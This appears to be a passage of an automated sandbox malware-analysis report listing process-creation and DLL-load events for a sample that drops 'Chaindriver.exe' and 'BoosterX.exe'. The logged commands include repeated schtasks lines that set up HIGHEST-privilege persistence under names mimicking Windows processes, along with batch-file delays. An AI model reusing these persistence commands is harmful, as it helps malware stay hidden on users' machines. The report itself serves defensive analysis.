                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: unknownProcess created: C:\Chaindriver.exe C:\Chaindriver.exe
                          Source: unknownProcess created: C:\Chaindriver.exe C:\Chaindriver.exe
                          Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                          Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Recovery\Memory Compression.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"Jump to behavior
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234
Source: C:\Chaindriver.sfx.exe | Process created: C:\Chaindriver.exe "C:\Chaindriver.exe"
Source: C:\Chaindriver.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
Source: C:\Chaindriver.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Chaindriver.exe "C:\Chaindriver.exe"
Source: C:\Recovery\Memory Compression.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: version.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: dxgidebug.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: sfc_os.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: sspicli.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: rsaenh.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: uxtheme.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: dwmapi.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: cryptbase.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: riched20.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: usp10.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: msls31.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: kernel.appcore.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: dpapi.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: windowscodecs.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: textshaping.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: textinputframework.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: coreuicomponents.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: coremessaging.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: ntmarta.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: coremessaging.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: wintypes.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: wintypes.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: wintypes.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: windows.storage.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: wldp.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: propsys.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: profapi.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: edputil.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: urlmon.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: iertutil.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: srvcli.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: netutils.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: appresolver.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: bcp47langs.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: slc.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: userenv.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: sppc.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: apphelp.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: pcacli.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: mpr.dll
Source: C:\Chaindriver.sfx.exe | Section loaded: msasn1.dll
Source: C:\Chaindriver.exe | Section loaded: mscoree.dll
Source: C:\Chaindriver.exe | Section loaded: apphelp.dll
Source: C:\Chaindriver.exe | Section loaded: kernel.appcore.dll
Source: C:\Chaindriver.exe | Section loaded: version.dll
Source: C:\Chaindriver.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: uxtheme.dll
Source: C:\Chaindriver.exe | Section loaded: windows.storage.dll
Source: C:\Chaindriver.exe | Section loaded: wldp.dll
Source: C:\Chaindriver.exe | Section loaded: profapi.dll
Source: C:\Chaindriver.exe | Section loaded: cryptsp.dll
Source: C:\Chaindriver.exe | Section loaded: rsaenh.dll
Source: C:\Chaindriver.exe | Section loaded: cryptbase.dll
Source: C:\Chaindriver.exe | Section loaded: sspicli.dll
Source: C:\Chaindriver.exe | Section loaded: ktmw32.dll
Source: C:\Chaindriver.exe | Section loaded: ntmarta.dll
Source: C:\Chaindriver.exe | Section loaded: wbemcomn.dll
Source: C:\Chaindriver.exe | Section loaded: amsi.dll
Source: C:\Chaindriver.exe | Section loaded: userenv.dll
Source: C:\Chaindriver.exe | Section loaded: propsys.dll
Source: C:\Chaindriver.exe | Section loaded: dlnashext.dll
Source: C:\Chaindriver.exe | Section loaded: wpdshext.dll
Source: C:\Chaindriver.exe | Section loaded: edputil.dll
Source: C:\Chaindriver.exe | Section loaded: urlmon.dll
Source: C:\Chaindriver.exe | Section loaded: iertutil.dll
Source: C:\Chaindriver.exe | Section loaded: srvcli.dll
Source: C:\Chaindriver.exe | Section loaded: netutils.dll
Source: C:\Chaindriver.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Chaindriver.exe | Section loaded: wintypes.dll
Source: C:\Chaindriver.exe | Section loaded: appresolver.dll
Source: C:\Chaindriver.exe | Section loaded: bcp47langs.dll
Source: C:\Chaindriver.exe | Section loaded: slc.dll
Source: C:\Chaindriver.exe | Section loaded: sppc.dll
Source: C:\Chaindriver.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Chaindriver.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
Source: C:\Chaindriver.exe | Section loaded: mscoree.dll
Source: C:\Chaindriver.exe | Section loaded: kernel.appcore.dll
Source: C:\Chaindriver.exe | Section loaded: version.dll
Source: C:\Chaindriver.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: uxtheme.dll
Source: C:\Chaindriver.exe | Section loaded: windows.storage.dll
Source: C:\Chaindriver.exe | Section loaded: wldp.dll
Source: C:\Chaindriver.exe | Section loaded: profapi.dll
Source: C:\Chaindriver.exe | Section loaded: cryptsp.dll
Source: C:\Chaindriver.exe | Section loaded: rsaenh.dll
Source: C:\Chaindriver.exe | Section loaded: cryptbase.dll
Source: C:\Chaindriver.exe | Section loaded: sspicli.dll
Source: C:\Chaindriver.exe | Section loaded: mscoree.dll
Source: C:\Chaindriver.exe | Section loaded: kernel.appcore.dll
Source: C:\Chaindriver.exe | Section loaded: version.dll
Source: C:\Chaindriver.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Chaindriver.exe | Section loaded: uxtheme.dll
Source: C:\Chaindriver.exe | Section loaded: windows.storage.dll
Source: C:\Chaindriver.exe | Section loaded: wldp.dll
Source: C:\Chaindriver.exe | Section loaded: profapi.dll
Source: C:\Chaindriver.exe | Section loaded: cryptsp.dll
Source: C:\Chaindriver.exe | Section loaded: rsaenh.dll
Source: C:\Chaindriver.exe | Section loaded: cryptbase.dll
Source: C:\Chaindriver.exe | Section loaded: sspicli.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: mscoree.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: apphelp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: version.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: wldp.dll
